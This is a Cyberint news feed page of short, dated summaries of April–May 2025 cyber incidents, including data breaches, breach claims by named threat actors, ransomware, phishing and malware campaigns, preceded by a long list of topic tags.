news
Breaking Cyber News From Cyberint
Breaking news feed of the latest cyber incidents, breaches, vulnerabilities, malware, ransomware and so much more.
- All Items
- Manufacturing
- United States
- North America
- Bytebreaker
- Telcel
- Viralgod
- Telecommunications
- Latin America And The Caribbean
- Mexico
- Peter Green Chilled
- Europe
- Transportation
- United Kingdom
- Cellcom
- Obfuscated Files Or Information
- Steal Web Session Cookie
- Deobfuscate/Decode Files Or Information
- Web Protocols
- Time Based Evasion
- Screen Capture
- Browser Extensions
- Stored Data Manipulation
- Google Chrome
- Exploitation For Client Execution
- Credentials From Web Browsers
- Drive-By Target
- Javascript
- Bypass User Account Control
- Windows File And Directory Permissions Modification
- Dns
- Domains
- Web Services
- Resource Hijacking
- System Information Discovery
- Timestomp
- Cron
- Network Service Discovery
- Smb/Windows Admin Shares
- Registry Run Keys / Startup Folder
- Remote System Discovery
- Xmrig
- Ingress Tool Transfer
- Linux And Mac File And Directory Permissions Modification
- Redis
- Exploit Public-Facing Application
- Unix Shell
- Dynamic Api Resolution
- Automated Exfiltration
- Powershell
- Mshta
- Archive Collected Data
- Process Hollowing
- Obfuscated Files Or Information: Encrypted Or Encoded Data
- Video Capture
- Remcos
- Keylogging
- Binary Padding
- Eastern Asia
- South Korea
- Technology
- Asia
- Adidas Korea
- Helluvahack
- Israel
- Middle East
- Real Estate
- Burgus Burger Bar
- Haxorteam
- Retail
- Business Services
- Beecomm
- Irontooth
- Venustech
- Npm Package
- Os-Info-Checker-Es6
- China
- Education
- Gambling
- Httpbot
- Tourism
- Nucor
- Spearphishing Attachment
- Malicious File
- Email Collection
- Horabot
- Visual Basic
- Chile
- Colombia
- Os Credential Dumping
- Windows Command Shell
- Peru
- Argentina
- Email Forwarding Rule
- Guatemala
- Israel Internet Association (Isoc-Il
- Finance
- Government
- Eternal
- Iraq
- CVE-2025-27920
- Cve-2025-27920
- Sea Turtle
- Kurdistan
- Noodlophile
- Xworm
- Mag
- Gatito_Fbi_Nz
- Paraguay
- Dooble
- Fedayeen Hackers
- Avid Technology
- Betway
- Pr Times
- Japan
- Im Corporation
- Blf0Ty
- Cve-2024-11120
- CVE-2018-10561
- Cve-2018-10561
- CVE-2024-11120
- Mirai
- CVE-2024-6047
- Geovision
- Cve-2024-6047
- Taiwan
- Uk Government
- Senegal
- Sub-Saharan Africa
- Africa
- Rhpolice.Sec.Gouv.Sn
- Kazu
- Bmci
- Sudo_Xxxx
- Morocco
- Northern Africa
- Telemessage
- Golden Chickens
- Terrastealerv2
- Terralogger
- Cve-2025-3928
- CVE-2025-3928
- Commvault Systems
- Terrasource Global
- Energy
- Phishing
- Russia
- Eastern Europe
- Media
- Hive0117
- Insurance Agents, Brokers And Service
- Purplehaze
- Goreshell
- Sentinelone
- South-Eastern Asia
- Shadowpad
- Movistar Venezuela
- Cypher404X
- Venezuela
- Woocommerce
- Paypal
- Financial Theft
- Critical Infrastructures
- L33Tfg
- Pjm Interconnection
- Dinac
- Automotive
- Arabian_Ghosts
- Network Denial Of Service
- Mprest
- Israel Port
- Password Spraying
- Storm-1977
- Israel'S National Insurance
- Sentap
- 3Ipe
- Spearphishing Link
- Lonefleet
- Blackshadow
- Match Legitimate Name Or Location
- Data From Local System
- Command And Scripting Interpreter
- Murkytour
- R00Tk1T
- Dji
- Go-Net Software Solutions
- Cyber Toufan Operation
- Southern Asia
- Nepal
- Nepal Police
-
May 21, 2025
Threat Actor Claims to Have Scraped Hundreds of Millions of Facebook Records
In May 2025, a threat actor named ByteBreaker claimed to have scraped accounts from Facebook. According to the threat actor, hundreds of millions of records belonging to Facebook's users were taken, including various types of data scraped by abusing one of their APIs.
-
May 21, 2025
Threat Actor Claims Breach of Mexican Telcel
In May 2025, a threat actor named Eternal claimed to have breached Telcel Mexico and to have gained access to its database. According to the threat actor, 10 million lines of data belonging to Telcel's customers were taken, including phone numbers, tax IDs (RFC), full names, and full addresses.
-
May 21, 2025
Peter Green Chilled Reports Shuts Operations Down Following Ransomware Attack
In May 2025, Peter Green Chilled became the victim of a ransomware attack when yet unknown threat actors managed to gain access to its systems, forcing the company to halt operations. According to Peter Green, the attack has severely disrupted its ability to process orders and manage logistics, impacting its supply chain for fresh products supplied to major retailers such as Aldi, Sainsbury’s, and Tesco.
-
May 21, 2025
Cellcom Reports Data Breach Following Outages
In May 2025, mobile carrier Cellcom became the victim of a cyberattack that caused widespread service outages and disruptions across Wisconsin and Upper Michigan. According to Cellcom, while the incident affected voice and SMS services, there is no evidence that personal information, such as names, addresses, or financial data, was compromised during the attack.
-
May 21, 2025
Malicious Chrome Extensions Target Users with Deceptive Tactics
A recently identified campaign attributed to an unknown threat actor involves the creation of several malicious Chrome browser extensions that disguise themselves as legitimate tools. Since February 2024, these extensions have been designed to exfiltrate user data, execute arbitrary code, and perform various malicious activities such as credential theft and session hijacking. The threat actor has set up over 100 fake websites that lure users into installing these extensions, which are available on the Chrome Web Store. Google has since removed the extensions.
-
May 21, 2025
New Linux Cryptojacking Campaign 'Redisraider' Targets Vulnerable Redis Servers
Cybersecurity researchers have identified a new Linux cryptojacking campaign named 'RedisRaider,' which targets publicly accessible Redis servers. The campaign involves scanning the IPv4 space to find vulnerable systems and executing malicious cron jobs to drop a Go-based payload that deploys an XMRig miner. The attackers use legitimate Redis commands to manipulate the server's configuration and inject a cron job that runs a base64-encoded shell script, ultimately leading to the installation of the malware. Additionally, the campaign employs anti-forensics measures to evade detection and has been linked to a broader strategy that includes a web-based Monero miner.
-
May 19, 2025
New Powershell-Based Malware Campaign Deploys Remcos RAT
Cybersecurity researchers have uncovered a new malware campaign that utilizes a Powershell-based shellcode loader to deploy the Remcos RAT (Remote Access Trojan). The attack employs malicious LNK files embedded in ZIP archives, often disguised as legitimate office documents, to lure victims into executing the malware. The attack chain leverages mshta.exe to execute an obfuscated HTA file that downloads and runs a Powershell script, which ultimately launches the Remcos RAT payload entirely in memory. This malware allows threat actors to gain full control over compromised systems, making it a potent tool for cyber espionage and data theft. The campaign highlights the evolving tactics of cybercriminals, who are increasingly using fileless malware techniques to evade traditional security measures.
-
May 18, 2025
Adidas Korea Reports Data Breach
In May 2025, Adidas became a victim of data breaches when threat actors managed to gain access to their customer databases. According to Adidas, customer data exposed in the breach included names, email addresses, phone numbers, dates of birth, and other personal details, although no financial information was compromised.
-
May 18, 2025
Threat Actor Offers For Sale Access to Israeli Real Estate Company
On May 16th, a threat actor using the alias "HelluvaHack" is selling VPN and RDP access to an Israeli real estate company on forum[.]exploit[.]in for $750 in Bitcoin. The actor, with a zero reputation score, claims the firm is based in Tel Aviv with 57 employees and $29 million in revenue. No proof or company name was provided, raising doubts about legitimacy.
-
May 18, 2025
Threat Actor Sells Data of BBB Group After Breaching Beecomm
In May 2025, the threat actor group "HAX0RTeam" claimed to possess sensitive data stolen from the Israeli food company BBB Group, following the claim of having infiltrated the Israeli Beecomm network. The data reportedly includes 1,000,000 customer interaction recordings and 490,000 full credit card records containing card numbers, expiration dates, CVV codes, customer IDs, and phone numbers. The dataset was offered for sale for 10 BTC, with payment accepted in Bitcoin or Monero.
-
May 18, 2025
Threat Actor Group Claims Breach of Beecomm
In May 2025, a threat actor group named "HAX0RTeam" claimed to have infiltrated the Israeli Beecomm network, gaining access to internal systems and customer data. They reported unauthorized access to the BBB Group database and exfiltration of over 1 million recorded calls containing ID card details, full credit card information, phone numbers, and personal conversations. Access to the Beecomm network was offered for sale at a price of 2 BTC, with individual customer networks to be sold separately.
-
May 18, 2025
Threat Actor Claims to Have Breached Venus Tech
In May 2025, a threat actor named IronTooth claimed to have breached the Chinese tech company Venus and to have gained access to its database. According to the threat actor, a collection of leaked documents belonging to Venus was taken, including papers, products sold to the government, client information, and various other sensitive materials.
-
May 18, 2025
New Malware Campaign Disguised as NPM Package
Cybersecurity researchers have identified a malicious NPM package named 'os-info-checker-es6' that masquerades as an operating system information utility while delivering a next-stage payload. The campaign employs sophisticated techniques, including unicode-based steganography and a Google Calendar event short link for dynamic payload delivery. Initially published on March 19, 2025, the package has been downloaded over 2,000 times, and while early versions showed no malicious behavior, a later version included obfuscated code that contacts a remote server. This tactic of using a trusted service like Google Calendar complicates detection and blocking efforts, indicating a potentially evolving threat within the NPM ecosystem.
-
May 18, 2025
Emergence of HTTPBot: A New Threat to Gaming and Technology Industries
Cybersecurity researchers have identified a new botnet malware named HTTPBot that primarily targets the gaming industry, technology companies, and educational institutions in China. First detected in August 2024, HTTPBot utilizes HTTP protocols to conduct distributed denial-of-service (DDoS) attacks with high precision, marking a shift from indiscriminate attacks to targeted business disruptions. The malware operates stealthily by concealing its graphical user interface and manipulating Windows registry settings to ensure it runs automatically. It has been responsible for over 200 attack instructions since April 2025, employing various sophisticated techniques to simulate legitimate traffic and exhaust server resources.
-
May 15, 2025
Nucor Corporation Reports Data Breach
In May 2025, Nucor Corporation became the victim of a cybersecurity incident when unauthorized third-party actors gained access to its information technology systems. According to Nucor, the attack led to considerable operational disruptions, forcing the company to temporarily suspend production at multiple facilities. While the nature and scope of the cyberattack remain undisclosed, it is unclear whether any customer data was exposed or stolen during the breach.
-
May 15, 2025
New Phishing Campaign Distributing Horabot Malware in Latin America
Cybersecurity researchers have uncovered a phishing campaign distributing malware known as Horabot, primarily targeting Windows users in Latin American countries such as Mexico, Guatemala, Colombia, Peru, Chile, and Argentina. The campaign utilizes crafted emails that mimic invoices or financial documents to deceive victims into opening malicious attachments, which can steal email credentials, harvest contact lists, and install banking trojans. The attacks, observed in April 2025, leverage automation to send phishing messages from victims' mailboxes and execute various scripts to conduct reconnaissance and steal credentials. Horabot has been active since at least November 2020 and is believed to be operated by a threat actor from Brazil.
-
May 13, 2025
Threat Actor Sells Access to Israel's Internet Exchange (IIX)
In May 2025, a threat actor group named "HAX0RTeam" claimed to be selling access to Israel’s Internet Exchange (IIX) network for $150,000. According to the listing, the access could enable interception of sensitive communications, traffic manipulation, data theft, malware injection, targeted attacks, and disruption of critical infrastructure. Payment options included Bitcoin and Monero, with escrow services accepted.
-
May 13, 2025
Threat Actor Offers Data From Mexican Companies
In May 2025, a threat actor named "Eternal" claimed to be selling a 200+ GB compilation of private databases from Mexico, containing billions of records. The data reportedly includes electoral records from INE (2008–2019), customer information from major banks such as BBVA, Banamex, and HSBC, Telcel and Telmex telephony data, WhatsApp active numbers in Mexico, university and retail databases, energy company data, and records from government institutions and political party affiliates. The compilation was listed for sale at $5,000 USD.
-
May 13, 2025
Marbled Dust Exploits Zero-Day in Indian Communication Platform for Espionage
A Türkiye-affiliated threat actor, known as Marbled Dust, has exploited a zero-day vulnerability in the Indian enterprise communication platform Output Messenger as part of a cyber espionage campaign targeting Kurdish military personnel in Iraq since April 2024. The vulnerability, identified as CVE-2025-27920, allows remote attackers to access arbitrary files and has been linked to a series of data exfiltration activities. Microsoft reported that the threat actor uses sophisticated techniques, including DNS hijacking, to gain access to user credentials and deploy malicious payloads, indicating an escalation in their operational capabilities.
-
May 13, 2025
New AI-Themed Malware Campaign Distributes 'Noodlophile' Infostealer via Fake Video Tools
A new malware campaign is distributing an information-stealing malware named "Noodlophile" through fake AI-powered video generation sites advertised on Facebook with names like "Dream Machine." These malicious sites trick users into downloading a ZIP archive that contains a disguised executable file posing as a video, which initiates a multi-stage infection process using legitimate tools like "CapCut," "certutil.exe," and Registry modifications for persistence. The final payload, "Noodlophile," exfiltrates browser credentials, session cookies, and cryptocurrency wallets via a Telegram bot and can be bundled with "XWorm" for enhanced remote access. The campaign appears to be linked to Vietnamese-speaking operators offering malware-as-a-service.
-
May 12, 2025
Threat Actor Claims Breach of Paraguay's Ministry of Agriculture
In May 2025, a threat actor named Gatito_FBI_Nz claimed to have breached the Ministry of Agriculture in Paraguay and to have gained access to its database. According to the threat actor, 1,414 records belonging to the ministry's suppliers were taken, including sensitive information such as usernames and passwords.
-
May 11, 2025
Fedayeen Hackers Claim Cyberattack on Israeli Firm Dooble Digital Solutions
On May 9, 2025, hacktivist group Fedayeen Hackers claimed responsibility for a cyberattack on Israeli software company Dooble Digital Solutions. The group alleges it exfiltrated source code, client credentials, internal documents, and other sensitive assets, including data linked to Israeli companies. A partial data leak was shared as proof, though Dooble has not confirmed the breach, and the authenticity of the claims remains unverified. The attack is part of a broader campaign by the group targeting Israeli digital infrastructure since early 2025
-
May 08, 2025
Threat Actor Sells Data Belonging to Avid CRM
In May 2025, a threat actor named "betway" claimed to have breached Avid.com, a U.S.-based media technology company with over $294.1 million in revenue. The threat actor stated they exfiltrated over 10 million rows of user data, including contact information, job titles, addresses, phone numbers, emails, account details, and internal CRM metadata. The dataset was listed for public sale with an asking price starting at $40,000.
-
May 08, 2025
PR Times Reports Data Breach - Exposing Data of 900K
In May 2025, PR TIMES reported it had become the victim of a data breach when threat actors managed to gain access to its database. According to PR TIMES, over 900,000 pieces of data belonging to customers were taken, including personal information from enterprise users, media users, individual users, and sensitive pre-release press materials. The Breach occurred on April 24th, 2025.
-
May 08, 2025
Threat Actor Claims to Have Breached IM Corporation, a Japanese Manufacturing Company
In May 2025, a threat actor named BLF0ty claimed to have breached im-eng.jp and to have gained access to its database. According to the threat actor, 1.88 GB of data belonging to im-eng.jp's customers was taken, including information related to hydraulic cylinder design and the manufacturing and processing of automobile parts.
-
May 07, 2025
Exploitation of Geovision IoT Devices by Mirai Botnet
Threat actors are actively exploiting security vulnerabilities in end-of-life Geovision IoT devices to incorporate them into a Mirai botnet, which is being used to conduct distributed denial-of-service (DDoS) attacks. The exploitation involves command injection flaws that allow attackers to execute arbitrary system commands, specifically targeting the /datesetting.cgi endpoint. As these devices are unlikely to receive patches due to their outdated firmware, users are advised to upgrade to newer models to protect against these threats.
-
May 07, 2025
UK's Legal Aid Agency Reports Data Breach
In May 2025, the UK Legal Aid Agency (LAA) became the victim of a data breach when threat actors managed to gain access to its systems. According to the LAA, there is a risk that financial information belonging to legal aid providers, including barristers and solicitor firms, may have been compromised, although the agency could not confirm if any data was accessed.
-
May 06, 2025
Threat Actor Claims to Have Breached Senegal's National Police, Extracting Over 150 GB of Data
In May 2025, threat actors named "Kazu" and "Joe" claimed to have breached the Senegal National Police's HR portal and to have gained access to its database. According to the threat actor, 152GB of data belonging to the Senegal Police's personnel was taken, including sensitive information such as ID cards, passports, education certificates, birth certificates, certificates of nationality, CVs, personal service records, certificates of good conduct, and authorizations to compete.
-
May 06, 2025
Threat Actor Claims to Have Breached Moroccan BMCI Bank
In May 2025, a threat actor named sudo_xxxx claimed to have breached BMCI Bank and gained access to its database. According to the threat actor, a substantial amount of data belonging to the bank's customers was taken, including client IDs, passwords, and account balances.
-
May 05, 2025
Threat Actor Claims to Have Breached TeleMessage
In May 2025, a threat actor breached TeleMessage, an Israeli company that provides modified versions of messaging apps like Signal, WhatsApp, Telegram, and WeChat to U.S. government agencies for message archiving. The threat actor accessed archived message contents, usernames and passwords for backend systems, and contact details for officials from agencies such as Customs and Border Protection, as well as employees of companies like Coinbase and Galaxy Digital. The data included snapshots of unencrypted messages, backend credentials, and communication metadata stored on TeleMessage’s servers.
-
May 05, 2025
Golden Chickens Unveils New Malware Families: TerrastealerV2 and Terralogger
The threat actor group known as Golden Chickens, also referred to as Venom Spider, has been linked to two new malware families, TerrastealerV2 and Terralogger, which are designed for credential theft and keylogging respectively. TerrastealerV2 collects sensitive data such as browser credentials and cryptocurrency wallet information, while Terralogger functions as a standalone keylogger without exfiltration capabilities. Both malware variants are believed to be in active development, showcasing the group's ongoing efforts to enhance their malware arsenal, which operates under a malware-as-a-service model. The group is reportedly based in Canada and Romania, and their activities have been ongoing since at least 2018.
-
May 04, 2025
Commvault - Breach - 2025-02-20
In February 2025, Commvault became the victim of a data breach when threat actors managed to gain access to its Azure cloud environment through a zero-day vulnerability. According to Commvault, unauthorized access affected a small number of customers, although there was no evidence that any customer data was compromised.
-
May 04, 2025
TerraSource Reports Data Breach Following Unauthorized Access by a Third Party
In May 2025, TerraSource Global became the victim of a data breach when threat actors managed to gain access to its database. According to TerraSource, sensitive personal identifiable information and protected health information belonging to an undetermined number of individuals was taken, including names, social security numbers, dates of birth, addresses, driver’s license numbers, government-issued ID numbers, financial information, medical information, and health insurance information.
-
May 04, 2025
Phishing Campaign Targets Russian Industries with Darkwatchman Malware
A large-scale phishing campaign has been targeting Russian companies across various sectors, including media, finance, and energy, using the Darkwatchman malware. Attributed to the financially motivated group Hive0117, the campaign has seen multiple waves of attacks since September 2023, employing social engineering tactics such as courier delivery themes to lure victims into opening password-protected malicious archives. Darkwatchman, a sophisticated JavaScript-based remote access trojan, is capable of keylogging and evading detection, posing significant risks to the targeted industries in Russia, Kazakhstan, Latvia, and Estonia.
-
Apr 30, 2025
SentinelOne Uncovers Chinese Espionage Campaign Targeting its Infrastructure and Clients
SentinelOne has identified a China-nexus threat cluster named PurpleHaze, which has been conducting reconnaissance against its infrastructure and high-value customers. This hacking group is loosely associated with the state-sponsored group APT15 and has targeted a South Asian government entity using a Windows backdoor called GoReShell. The attackers have employed an operational relay box network to enhance their cyberespionage capabilities. Previous attacks involved the use of ShadowPad, a backdoor linked to various espionage activities, indicating a potential overlap in operations
-
Apr 30, 2025
Threat Actor Claims to Have Breached Movistar Venezuela
In April 2025, a threat actor named "Cypher404x" claimed to have breached Movistar Venezuela and to have gained access to its database. According to the threat actor, 4,376,105 records belonging to Movistar's customers were taken, including personal data.
-
Apr 29, 2025
Phishing Campaign Targets WooCommerce Users with Fake Security Alerts
Cybersecurity researchers have identified a large-scale phishing campaign targeting WooCommerce users, where victims receive fake security alerts urging them to download a 'critical patch.' This malicious activity, is believed to be a variant of a previous campaign that used a fake CVE to breach sites running the popular content management system. The phishing emails lead users to a spoofed WooCommerce marketplace page, where they inadvertently download malware that creates a new administrator account on their site, allowing attackers remote control to inject spam, redirect visitors, or even launch DDoS attacks.
-
Apr 28, 2025
Phishing Campaign Exploiting ISRAELI COSTUMERS, USING PayPal’s Donation Feature
Over the past 24 hours, a phishing campaign has been circulating in Israel that exploits PayPal’s donation feature to convey an appearance of legitimacy. Attackers send SMS messages demanding payment of shipping fees. Rather than directing recipients to a fraudulent website to steal credit-card details, the message links to a genuine PayPal donation page displaying the same amount requested in the SMS. To bolster perceived legitimacy, threat actors overlay the PayPal interface with familiar logos, such as Israel Post, and copy PayPal’s styling and copy almost verbatim. The attackers rely on the victim’s trust in PayPal’s brand. Once the victim submits payment, the funds are transferred directly into the attacker’s PayPal account.
-
Apr 28, 2025
Threat Actor Claims Breach of PJM Interconnection
In April 2025, a threat actor named l33tfg claimed to have breached PJM Interconnection LLC, the largest electric transmission system in North America, and to have gained access to its database. According to the threat actor, over 4,000 leaked database entries belonging to PJM's customers were taken, including personal information such as names, email addresses, and phone numbers.
-
Apr 28, 2025
Threat Actor Claims to Have Breached DINAC - The National Directory of Civil Aeronautics of Paraguay
In April 2025, a threat actor named Gatito_FBI_Nz claimed to have breached the Dirección Nacional de Aeronáutica Civil (DINAC) in Paraguay and to have gained access to its database. According to the threat actor, a complete leak was extracted from the cloud system, which included several internal documents believed to be related to national security, such as curriculum vitae and other sensitive information.
-
Apr 27, 2025
DDoS Attack on mPrest, an Israeli Technology Company Specializing in Critical Infrastructure
On April 27th, the hacktivist group Arabian Ghosts claimed to have launched a DDoS attack against the website of mPrest, an Israeli technology company specializing in software and smart control systems for sectors such as energy, defense, and critical infrastructure. Using the hashtag #OpIsrael, suggesting a connection to the broader OpIsrael campaign.
-
Apr 27, 2025
DDoS Attack on Israel Ports Company (Israports)
On April 27th, the hacktivist group Arabian Ghosts claimed to have launched a DDoS attack against the website of Israel Ports Company (Israports), the state-owned company responsible for developing and maintaining Israel’s seaport infrastructure. Using the hashtag #OpIsrael , suggesting a connection to the broader OpIsrael campaign.
-
Apr 27, 2025
Storm-1977 Targets Education Sector with Password Spraying Attacks
Investigators have reported that a threat actor known as Storm-1977 has been conducting password spraying attacks against cloud tenants in the education sector over the past year. The attacks utilize a command-line interface tool called azurechecker.exe, which connects to an external server to retrieve AES-encrypted data containing a list of targets. The attackers have successfully compromised accounts, creating resource groups and deploying over 200 containers for illicit cryptocurrency mining.
-
Apr 24, 2025
Phishing Campaign Targets Israelis with Fake Bituach Leumi Emails
CERT-IL warns of a phishing campaign impersonating Israel’s National Insurance Institute. Victims receive fake emails urging them to download a “report,” which installs ScreenConnect RAT, granting attackers remote access. The campaign uses spoofed domains and a disguised .exe file. Authorities urge caution and IOC monitoring.
-
Apr 24, 2025
Threat Actor Sells Data Belonging to 3ipe
In April 2025, a threat actor named Sentap claimed to have breached 3ipe.com and to have gained access to its database. According to the threat actor, 568 GB of exclusive engineering and commercial data belonging to 3ipe's customers was taken, including technical and scientific documents, commercial and project data, visual content, geographic data, management tools, and human resources archives. The threat actor is selling the dataset for 12 thousand dollars.
-
Apr 24, 2025
Iran-Linked Hackers Deploy MURKYTOUR Malware in Fake Job Scheme Targeting Israel
In October 2024, Iranian-aligned threat actor UNC2428 launched a sophisticated cyber espionage campaign against Israel using a backdoor malware named MURKYTOUR. Disguised as a job recruitment effort from Israeli defense contractor Rafael, the attackers lured victims into downloading a fake job application tool called "RafaelConnect.exe." The installer, dubbed LONEFLEET, featured a convincing graphical interface to collect personal data and resumes. Meanwhile, the MURKYTOUR malware was covertly deployed via a launcher known as LEAFPILE, granting the hackers persistent access to infected systems. This campaign, linked to Iran’s Ministry of Intelligence and Security (MOIS), overlaps with activity attributed to the Iranian group Black Shadow and is part of broader Iranian efforts targeting multiple sectors in Israel.
-
Apr 24, 2025
Russian Military Targeted by New Android Spyware Campaign
Cybersecurity researchers have uncovered a malicious campaign targeting Russian military personnel, distributing Android spyware disguised as the Alpine Quest mapping software. The malware, identified as android.spy.1292.origin, is embedded in modified versions of the app and is propagated through Russian app catalogs and fake Telegram channels. Once installed, it collects sensitive data such as phone numbers, contact lists, geolocation, and stored files, while also allowing attackers to exfiltrate files via Telegram and WhatsApp. The campaign exploits the app's popularity among military users, emphasizing the need for caution when downloading apps from untrusted sources.
-
Apr 23, 2025
R00TK1T Claims DJI Customer Data Theft
On April 21, 2025, a threat actor group identifying as "R00TK1T" publicly claimed responsibility for breaching DJI’s systems and exfiltrating a large amount of sensitive customer data. According to their statement, the stolen information includes order details, customer names, tracking numbers, pricing, drone specifications, contact information, and payment methods. The group is allegedly selling the data through a private channel.
-
Apr 23, 2025
Cyber Toufan Claims Breach of Israeli Software Firm 'Go-Net'
The pro-Palestinian hacktivist group Cyber Toufan claimed responsibility for breaching the Israeli software development firm Go-Net Software Solutions, which allegedly provides services to entities such as the IDF, insurance companies, banks, etc. In a Telegram post, the group alleged it had maintained persistent access to Go-Net’s network for over a year, during which it exfiltrated source code and internal databases. A sample of the stolen data was released publicly, with more sensitive material reportedly shared with affiliated threat actors. Go-Net has yet to comment on the incident, and the extent of the breach remains unverified.
-
Apr 23, 2025
Threat Actor Claims to Have Breached The Nepal Police
In April 2025, a threat actor named Kazu claimed to have breached the Nepal Police Central Website and to have gained access to its database. According to the threat actor, over 2 million records belonging to Nepal Police's citizens were taken, including face images, ID cards, passports, and personally identifiable information (PII).
